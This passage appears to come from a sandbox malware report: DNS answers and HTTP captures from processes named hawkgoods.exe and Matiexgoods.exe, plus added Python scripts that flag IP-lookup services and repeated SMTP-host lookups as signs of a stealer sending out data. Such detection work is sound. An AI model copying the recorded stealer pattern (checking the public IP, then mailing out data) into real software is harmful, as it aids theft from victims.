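from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample: rows copied from the table above in the run-together
# form the HTML extraction produced.
SAMPLE_ROWS = """\
Feb 2, 2021 08:51:53.379492044 CET192.168.2.78.8.8.80xf445Standard query (0)69.170.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 2, 2021 08:51:53.900830984 CET192.168.2.78.8.8.80x6da6Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
Feb 2, 2021 08:52:04.437439919 CET192.168.2.78.8.8.80x6b02Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
Feb 2, 2021 08:52:12.981060028 CET192.168.2.78.8.8.80x872aStandard query (0)freegeoip.appA (IP address)IN (0x0001)
Feb 2, 2021 08:52:22.276596069 CET192.168.2.78.8.8.80x849cStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
Feb 2, 2021 08:52:23.339813948 CET192.168.2.78.8.8.80xb3beStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
Feb 2, 2021 08:52:24.584064960 CET192.168.2.78.8.8.80x9e74Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
Feb 2, 2021 08:52:25.612889051 CET192.168.2.78.8.8.80x52d5Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
"""

# Services that only tell the caller its public address or location; stealers
# resolve them to tag the data they exfiltrate (analyst-chosen watchlist).
IP_LOOKUP_WATCHLIST = {"whatismyipaddress.com", "checkip.dyndns.org", "freegeoip.app"}

_IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"


def _row_pattern(src_ip: str) -> "re.Pattern[str]":
    # Two dotted quads run together ("192.168.2.78.8.8.8") cannot be split
    # reliably, so the known source IP is matched literally; the dest IP is
    # then bounded by the literal "0x" of the transaction ID.
    return re.compile(
        r"^(?P<ts>.+? [A-Z]{3,4})" + re.escape(src_ip)
        + r"(?P<dst>" + _IPV4 + r")(?P<tid>0x[0-9a-fA-F]+)"
        r"(?P<op>[^()]+\(\d+\))(?P<name>.+?)"
        r"(?P<rtype>[A-Z]+) \([^)]*\)(?P<cls>[A-Z]+) \(0x[0-9a-fA-F]+\)$"
    )


def _parse_ts(ts: str) -> datetime:
    # "Feb 2, 2021 08:51:53.379492044 CET": drop the zone, keep microseconds
    stamp, _zone = ts.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_row(line: str, src_ip: str = "192.168.2.7"):
    """Return one query record, or None if the row does not parse cleanly."""
    m = _row_pattern(src_ip).match(line.strip())
    if not m:
        return None
    try:
        dst = str(ipaddress.IPv4Address(m["dst"]))  # rejects octets > 255
    except ipaddress.AddressValueError:
        return None
    return {
        "ts": _parse_ts(m["ts"]), "src": src_ip, "dst": dst,
        "trans_id": int(m["tid"], 16), "opcode": m["op"].strip(),
        "name": m["name"], "rtype": m["rtype"], "cls": m["cls"],
    }


def parse_rows(text: str, src_ip: str = "192.168.2.7"):
    recs = (parse_row(line, src_ip) for line in text.splitlines() if line.strip())
    return [r for r in recs if r is not None]


def summarise(records, watchlist=IP_LOOKUP_WATCHLIST, burst_count=4, burst_window_s=10.0):
    """Count names, flag IP-lookup services, and report names resolved
    burst_count times within burst_window_s seconds."""
    counts = Counter(r["name"] for r in records)
    by_name = defaultdict(list)
    for r in records:
        by_name[r["name"]].append(r["ts"])
    bursts = {}
    for name, times in by_name.items():
        times.sort()
        for i in range(len(times) - burst_count + 1):
            span = (times[i + burst_count - 1] - times[i]).total_seconds()
            if span <= burst_window_s:
                bursts[name] = span  # seconds covered by the first burst
                break
    return {
        "counts": dict(counts),
        "ip_lookups": sorted(n for n in counts if n in watchlist),
        "bursts": bursts,
        "reverse_lookups": sorted({r["name"] for r in records if r["rtype"] == "PTR"}),
    }


if __name__ == "__main__":
    for key, value in summarise(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

Run against the eight sample rows, the summary reports three watchlist hits, one reverse lookup of the sandbox's own public address, and a burst of four smtp.privateemail.com resolutions inside 3.4 seconds; the same code over the full table yields the much longer run of SMTP lookups that continues to the end of the capture. The source address is passed in rather than guessed because the flattened format gives no delimiter between the two IPs, and a generic split would be ambiguous for addresses whose octets can be regrouped.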

                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 2, 2021 08:51:53.438116074 CET | 8.8.8.8 | 192.168.2.7 | 0xf445 | Name error (3) | 69.170.12.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 2, 2021 08:51:53.960005045 CET | 8.8.8.8 | 192.168.2.7 | 0x6da6 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:51:53.960005045 CET | 8.8.8.8 | 192.168.2.7 | 0x6da6 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.487238884 CET | 8.8.8.8 | 192.168.2.7 | 0x6b02 | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET | 8.8.8.8 | 192.168.2.7 | 0xc21c | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:13.041534901 CET | 8.8.8.8 | 192.168.2.7 | 0x872a | No error (0) | freegeoip.app |  | 104.21.19.200 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:13.041534901 CET | 8.8.8.8 | 192.168.2.7 | 0x872a | No error (0) | freegeoip.app |  | 172.67.188.154 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:22.335807085 CET | 8.8.8.8 | 192.168.2.7 | 0x849c | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:23.400106907 CET | 8.8.8.8 | 192.168.2.7 | 0xb3be | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:24.643059969 CET | 8.8.8.8 | 192.168.2.7 | 0x9e74 | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:25.671786070 CET | 8.8.8.8 | 192.168.2.7 | 0x52d5 | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:27.212202072 CET | 8.8.8.8 | 192.168.2.7 | 0xc1d8 | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:28.546897888 CET | 8.8.8.8 | 192.168.2.7 | 0xc3b0 | No error (0) | smtp.privateemail.com |  | 199.193.7.228 | A (IP address) | IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:30.337150097 CET8.8.8.8192.168.2.70x9914No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:32.104201078 CET8.8.8.8192.168.2.70x276No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:34.043262005 CET8.8.8.8192.168.2.70xd60aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:36.223865032 CET8.8.8.8192.168.2.70xb80cNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:37.348948956 CET8.8.8.8192.168.2.70xcfe2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:38.086824894 CET8.8.8.8192.168.2.70x220eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.252991915 CET8.8.8.8192.168.2.70x91f5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.356125116 CET8.8.8.8192.168.2.70xfe1eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.688971043 CET8.8.8.8192.168.2.70xfc0eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:42.421161890 CET8.8.8.8192.168.2.70x368eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:43.541801929 CET8.8.8.8192.168.2.70xe0c2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:45.028855085 CET8.8.8.8192.168.2.70xbda6No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.405642033 CET8.8.8.8192.168.2.70x1787No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.647037029 CET8.8.8.8192.168.2.70x3404No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.431301117 CET8.8.8.8192.168.2.70x3390No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.706617117 CET8.8.8.8192.168.2.70x9a1aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:53.313534021 CET8.8.8.8192.168.2.70x7125No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:56.331607103 CET8.8.8.8192.168.2.70xca4No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.312505007 CET8.8.8.8192.168.2.70xb67fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.482912064 CET8.8.8.8192.168.2.70xe5c5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:00.353419065 CET8.8.8.8192.168.2.70x1a9cName error (3)69.170.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:01.060314894 CET8.8.8.8192.168.2.70x3e9No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:01.060314894 CET8.8.8.8192.168.2.70x3e9No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:02.204837084 CET8.8.8.8192.168.2.70x747fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:05.928864956 CET8.8.8.8192.168.2.70x7f71No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:09.281547070 CET8.8.8.8192.168.2.70x3367No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:18.103461981 CET8.8.8.8192.168.2.70x249aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:20.837517023 CET8.8.8.8192.168.2.70x89c8No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:24.195363045 CET8.8.8.8192.168.2.70x2a46No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:27.599453926 CET8.8.8.8192.168.2.70x43b4No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.512851000 CET8.8.8.8192.168.2.70xba64No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.649574995 CET8.8.8.8192.168.2.70xbb55No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:38.297360897 CET8.8.8.8192.168.2.70x74bcNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:42.090331078 CET8.8.8.8192.168.2.70x3d6aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET8.8.8.8192.168.2.70x68c3No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET8.8.8.8192.168.2.70x68c3No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.172378063 CET8.8.8.8192.168.2.70x5a1fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:12.842149973 CET8.8.8.8192.168.2.70xcb32No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:15.948564053 CET8.8.8.8192.168.2.70xe537No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:19.097718954 CET8.8.8.8192.168.2.70x224fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:22.327384949 CET8.8.8.8192.168.2.70xd7eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:23.880672932 CET8.8.8.8192.168.2.70xaef0No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:33.360323906 CET8.8.8.8192.168.2.70xa8a1No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.256642103 CET8.8.8.8192.168.2.70x92d2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.260183096 CET8.8.8.8192.168.2.70x2b45No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:38.991988897 CET8.8.8.8192.168.2.70x874fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:40.767158031 CET8.8.8.8192.168.2.70xc8e5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:42.011138916 CET8.8.8.8192.168.2.70x53c9No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:43.863847971 CET8.8.8.8192.168.2.70xca13No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:48.980370045 CET8.8.8.8192.168.2.70xc966No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.876228094 CET8.8.8.8192.168.2.70xba1aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.879745960 CET8.8.8.8192.168.2.70xecd6No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.609613895 CET8.8.8.8192.168.2.70x5da3No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.630439997 CET8.8.8.8192.168.2.70xee93No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.316422939 CET8.8.8.8192.168.2.70x756bNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.477765083 CET8.8.8.8192.168.2.70xaa2bNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:55:11.436451912 CET8.8.8.8192.168.2.70x1733No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
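The DNS answers above carry two patterns worth turning into detections: the resolution of public "what is my IP" services (checkip.dyndns.org, whatismyipaddress.com, freegeoip.app) and the dozens of fresh lookups of smtp.privateemail.com, one per transaction ID, over roughly three minutes. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses a subset of the rows transcribed from the table (written with one `|` between fields, in Joe Sandbox's column order) and emits one finding per pattern, including the query cadence for the SMTP host. The domain list, the `smtp.` prefix heuristic and the `beacon_threshold` value are this example's assumptions.

```python
"""Triage the "DNS Answers" rows of a Joe Sandbox report.

Added example; not part of the report or of Joe Sandbox. SAMPLE_ROWS is a
subset transcribed from the table above with one '|' between fields, in the
column order Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name |
CName | Address | Type | Class.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Transcribed from the report (a representative subset, not all rows).
SAMPLE_ROWS = """\
Feb 2, 2021 08:52:04.487238884 CET|8.8.8.8|192.168.2.7|0x6b02|No error (0)|checkip.dyndns.com||216.146.43.70|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET|8.8.8.8|192.168.2.7|0xc21c|No error (0)|checkip.dyndns.org|checkip.dyndns.com||CNAME (Canonical name)|IN (0x0001)
Feb 2, 2021 08:52:04.566323042 CET|8.8.8.8|192.168.2.7|0xc21c|No error (0)|checkip.dyndns.com||216.146.43.70|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:13.041534901 CET|8.8.8.8|192.168.2.7|0x872a|No error (0)|freegeoip.app||104.21.19.200|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:22.335807085 CET|8.8.8.8|192.168.2.7|0x849c|No error (0)|smtp.privateemail.com||199.193.7.228|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:23.400106907 CET|8.8.8.8|192.168.2.7|0xb3be|No error (0)|smtp.privateemail.com||199.193.7.228|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:24.643059969 CET|8.8.8.8|192.168.2.7|0x9e74|No error (0)|smtp.privateemail.com||199.193.7.228|A (IP address)|IN (0x0001)
Feb 2, 2021 08:52:25.671786070 CET|8.8.8.8|192.168.2.7|0x52d5|No error (0)|smtp.privateemail.com||199.193.7.228|A (IP address)|IN (0x0001)
Feb 2, 2021 08:53:00.353419065 CET|8.8.8.8|192.168.2.7|0x1a9c|Name error (3)|69.170.12.0.in-addr.arpa|none|none|PTR (Pointer record)|IN (0x0001)
Feb 2, 2021 08:53:01.060314894 CET|8.8.8.8|192.168.2.7|0x3e9|No error (0)|whatismyipaddress.com||104.16.155.36|A (IP address)|IN (0x0001)
"""

# Assumption: the public IP-lookup services seen in this report. The signature
# list calls this behaviour "May check the online IP address of the machine".
IP_CHECK_DOMAINS = {"checkip.dyndns.org", "checkip.dyndns.com",
                    "whatismyipaddress.com", "freegeoip.app"}

TS_RE = re.compile(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+")


@dataclass
class DnsAnswer:
    ts: datetime
    txid: int
    rcode: str
    name: str
    cname: str
    address: str
    rtype: str  # "A", "CNAME", "PTR", ...


def parse_ts(text: str) -> datetime:
    """Joe Sandbox prints nanoseconds; datetime's %f accepts at most six digits.
    The zone suffix is dropped, so values are naive but mutually comparable."""
    m = TS_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base, frac = m.groups()
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text: str) -> list[DnsAnswer]:
    answers = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split("|")
        if len(f) != 10:
            raise ValueError(f"expected 10 fields, got {len(f)}: {line!r}")
        answers.append(DnsAnswer(ts=parse_ts(f[0]), txid=int(f[3], 16), rcode=f[4],
                                 name=f[5].lower(), cname=f[6], address=f[7],
                                 rtype=f[8].split(" ", 1)[0]))
    return answers


def ptr_to_ip(name: str) -> str:
    """Recover the dotted IPv4 address that an in-addr.arpa name reverses."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        raise ValueError(f"not a reverse name: {name!r}")
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4 or not all(lab.isdigit() for lab in labels):
        raise ValueError(f"malformed reverse name: {name!r}")
    return ".".join(reversed(labels))


def triage(answers: list[DnsAnswer], beacon_threshold: int = 3) -> list[dict]:
    """Group answers by queried name and emit one finding per suspicious pattern."""
    by_name: dict[str, list[DnsAnswer]] = defaultdict(list)
    for a in answers:
        by_name[a.name].append(a)
    findings = []
    for name, rows in sorted(by_name.items()):
        addrs = sorted({r.address for r in rows if r.rtype == "A"})
        if name in IP_CHECK_DOMAINS:
            findings.append({"kind": "external-ip-lookup", "name": name, "addresses": addrs})
        # One transaction ID per query: count queries, not answer records.
        queries = {r.txid for r in rows}
        if name.startswith("smtp.") and len(queries) >= beacon_threshold:
            times = sorted({r.ts for r in rows})
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            findings.append({"kind": "smtp-beacon", "name": name, "addresses": addrs,
                             "queries": len(queries),
                             "min_gap_s": round(min(gaps), 3),
                             "max_gap_s": round(max(gaps), 3)})
        for r in rows:
            if r.rtype == "PTR":
                findings.append({"kind": "ptr-lookup", "name": name,
                                 "ip": ptr_to_ip(name), "rcode": r.rcode})
    return findings


if __name__ == "__main__":
    for finding in triage(parse_rows(SAMPLE_ROWS)):
        print(finding)
```

Counting distinct transaction IDs rather than rows matters here: a single query for checkip.dyndns.com returns four or five A records, so row counts would overstate how often the sample actually asked. The sub-second to multi-second spacing of the smtp.privateemail.com queries is what distinguishes a sender that resolves its mail host before every message from a normal client that caches the answer.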

HTTP Request Dependency Graph

• whatismyipaddress.com
• checkip.dyndns.org

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49729 | 104.16.155.36 | 80 | C:\Users\user\AppData\Local\Temp\hawkgoods.exe

Timestamp | kBytes transferred | Direction | Data
Feb 2, 2021 08:51:54.075356960 CET | 1007 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Feb 2, 2021 08:51:54.127437115 CET | 1008 | IN | HTTP/1.1 403 Forbidden
Date: Tue, 02 Feb 2021 07:51:54 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: __cfduid=de810853b8bb2cf1036f76079d68ccb1c1612252314; expires=Thu, 04-Mar-21 07:51:54 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
cf-request-id: 08035311fa00000eb751133000000001
Server: cloudflare
CF-RAY: 61b254632f520eb7-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
Data Ascii: error code: 1020
Feb 2, 2021 08:51:54.375992060 CET | 1008 | IN | HTTP/1.1 403 Forbidden
Date: Tue, 02 Feb 2021 07:51:54 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: __cfduid=de810853b8bb2cf1036f76079d68ccb1c1612252314; expires=Thu, 04-Mar-21 07:51:54 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
cf-request-id: 08035311fa00000eb751133000000001
Server: cloudflare
CF-RAY: 61b254632f520eb7-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
Data Ascii: error code: 1020


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49731 | 131.186.113.70 | 80 | C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data
Feb 2, 2021 08:52:04.697185040 CET | 1039 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 2, 2021 08:52:04.757770061 CET | 1039 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0.1
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 103
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>
